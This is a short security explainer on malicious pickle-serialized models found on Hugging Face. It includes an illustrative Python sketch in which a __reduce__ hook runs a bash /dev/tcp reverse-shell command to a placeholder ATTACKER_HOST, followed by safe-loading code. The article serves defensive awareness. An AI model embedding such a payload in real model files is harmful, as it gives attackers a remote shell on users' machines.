JFrog Security Research recently uncovered roughly 100 malicious machine learning models on the Hugging Face AI platform [3]. The models pose a significant security threat because simply loading them can execute attacker-supplied code on the user’s machine.

Description

Despite Hugging Face’s security measures, such as malware and secrets scanning [2][3], these harmful models evaded detection by embedding malicious code within the trusted model serialization process [4]: PyTorch checkpoints rely on Python’s pickle format, which can execute arbitrary code during deserialization. One instance involved a PyTorch model uploaded by a user named “baller423” that contained a payload capable of establishing a reverse shell connection to a hard-coded remote host [2]. While some of these uploads may have been part of security research [1][2][4], the operators’ actions were still deemed risky and inappropriate [2]. The public availability of such dangerous models highlights the need for increased vigilance and proactive defenses against malicious actors in the AI/ML model ecosystem; the sketch below illustrates the underlying technique.
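
To see why loading alone is enough, recall that pickle invokes an object’s __reduce__ hook during deserialization and calls whatever it returns. The following is an illustrative sketch only; the class name, command string, and ATTACKER_HOST placeholder are ours, not the actual baller423 payload:

    import pickle

    class MaliciousPayload:
        # Pickle calls __reduce__ while deserializing and then invokes the
        # (callable, args) pair it returns -- the victim never has to call
        # any method on the object themselves.
        def __reduce__(self):
            import os
            # Placeholder reverse-shell command; the reported payload
            # connected back to a hard-coded host in a similar way.
            return (os.system, ("bash -i >& /dev/tcp/ATTACKER_HOST/4444 0>&1",))

    # The attacker serializes the object into what looks like model weights...
    blob = pickle.dumps(MaliciousPayload())

    # ...and deserializing the file would run the embedded command at once:
    # pickle.loads(blob)  # intentionally left commented out

Scanners struggle with this class of payload because it is stored as data rather than as a conventional executable, and it only becomes code at deserialization time.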

Conclusion

The discovery of these malicious models underscores the importance of strengthening security protocols on AI platforms to prevent similar incidents. It is also a reminder for users to exercise caution when loading unknown models, to prefer loading paths that cannot execute code (see the sketch below), and to report suspicious activity promptly. By staying vigilant and adopting robust security measures, the AI community can better protect itself against these threats and preserve the integrity of its model ecosystem.
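
As a practical complement to platform-side scanning, users can load third-party checkpoints in ways that refuse to execute pickle payloads. A minimal defensive sketch, assuming hypothetical filenames "model.bin" and "model.safetensors":

    import torch
    from safetensors.torch import load_file

    # Option 1: weights_only=True (available in recent PyTorch releases)
    # restricts the unpickler to tensor and primitive types, so a
    # __reduce__-based payload raises an error instead of executing.
    state_dict = torch.load("model.bin", weights_only=True)

    # Option 2: the safetensors format stores raw tensors and contains no
    # executable code, so loading it cannot trigger pickle exploits.
    state_dict = load_file("model.safetensors")

Neither option removes the need to vet a model’s provenance, but both close off the code-execution path that the reported payloads relied on.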

References

[1] https://cyber.vumetric.com/security-news/2024/02/28/malicious-ai-models-on-hugging-face-backdoor-users-machines/
[2] https://ciso2ciso.com/malicious-ai-models-on-hugging-face-backdoor-users-machines-source-www-bleepingcomputer-com/
[3] https://www.darkreading.com/application-security/hugging-face-ai-platform-100-malicious-code-execution-models
[4] https://bestofai.com/article/malicious-ai-models-on-hugging-face-backdoor-usersrsquo-machines